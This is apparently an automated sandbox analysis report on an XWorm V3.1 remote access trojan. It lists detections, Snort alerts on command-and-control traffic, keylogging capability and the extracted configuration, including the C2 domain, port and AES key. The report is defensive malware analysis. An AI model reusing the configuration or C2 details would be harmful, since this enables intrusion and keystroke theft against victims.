Windows Analysis Report
171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe

Overview

General Information

Sample name: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Analysis ID: 1432799
MD5: d80a57c22c976dd67cb96f64e009e923
SHA1: ceb8be5527547cfeb3f20b273017f05d81bd0624
SHA256: ba85829ab0137d7f35c619f1d716de735d57a2ab9a4e6dd83950f96af1407a6b
Tags: base64-decodedexe
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Avira: detected
Antivirus detection for URL or domain
Source: nmds.duckdns.org Avira URL Cloud: Label: malware
Found malware configuration
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Multi AV Scanner detection for domain / URL
Source: nmds.duckdns.org Virustotal: Detection: 15% Perma Link
Source: nmds.duckdns.org Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for submitted file
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe ReversingLabs: Detection: 81%
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Virustotal: Detection: 80% Perma Link
Machine Learning detection for sample
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: nmds.duckdns.org
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: 8895
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: <123456789>
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: <Xwormmm>
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe String decryptor: USB.exe
Uses 32bit PE files
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88CE39h 0_2_00007FFD9B88C7F9
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88CE4Ah 0_2_00007FFD9B88C7F9
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B890F61
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88F991h 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88FCADh 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then mov eax, dword ptr [ebp-44h] 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B893382h 0_2_00007FFD9B8931EC
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then jmp 00007FFD9B88C222h 0_2_00007FFD9B88C09F
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B8911B9
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B8910FA
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B891155
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 4x nop then dec eax 0_2_00007FFD9B891093

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49730 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 87.121.105.4:8895 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 87.121.105.4:8895 -> 192.168.2.4:49746
Source: Traffic Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49746 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49746 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 87.121.105.4:8895 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 87.121.105.4:8895 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.4:49750 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49750 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 87.121.105.4:8895
Source: Traffic Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 87.121.105.4:8895
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: nmds.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: nmds.duckdns.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 87.121.105.4:8895
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.121.105.4 87.121.105.4
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 23.56.8.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown TCP traffic detected without corresponding DNS query: 23.199.71.185
Source: unknown TCP traffic detected without corresponding DNS query: 23.199.71.184
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePH36pyBPCcPnFr&MD=c6hfexxl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ePH36pyBPCcPnFr&MD=c6hfexxl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic DNS traffic detected: DNS query: nmds.duckdns.org
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4096024846.00000000024E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_51.4.dr String found in binary or memory: http://www.broofa.com
Source: chromecache_56.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_56.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_56.4.dr, chromecache_51.4.dr String found in binary or memory: https://apis.google.com
Source: chromecache_56.4.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_56.4.dr String found in binary or memory: https://content.googleapis.com
Source: chromecache_56.4.dr String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: chromecache_56.4.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_51.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_51.4.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_56.4.dr String found in binary or memory: https://plus.google.com
Source: chromecache_56.4.dr String found in binary or memory: https://plus.googleapis.com
Source: chromecache_56.4.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: chromecache_56.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_56.4.dr String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_51.4.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_51.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_51.4.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.56.8.114:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, XLogger.cs .Net Code: KeyboardLayout

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B88D28D 0_2_00007FFD9B88D28D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B887282 0_2_00007FFD9B887282
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B88A99E 0_2_00007FFD9B88A99E
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B88946D 0_2_00007FFD9B88946D
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Code function: 0_2_00007FFD9B8864D6 0_2_00007FFD9B8864D6
Sample file is different than original file name gathered from version info
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameXwrm3.1.exe4 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4097692510.000000001BD80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFileManager.dll8 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, 00000000.00000002.4099447326.000000001C090000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Binary or memory string: OriginalFilenameXwrm3.1.exe4 vs 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe
Uses 32bit PE files
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.320000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1624173863.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1bd80000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1bd80000.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1c090000.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe.1c090000.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/14@7/5
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Mutant created: NULL
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe ReversingLabs: Detection: 81%
Source: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe Virustotal: Detection: 80%
Source: unknown Process created: C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe "C:\Users\user\Desktop\171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
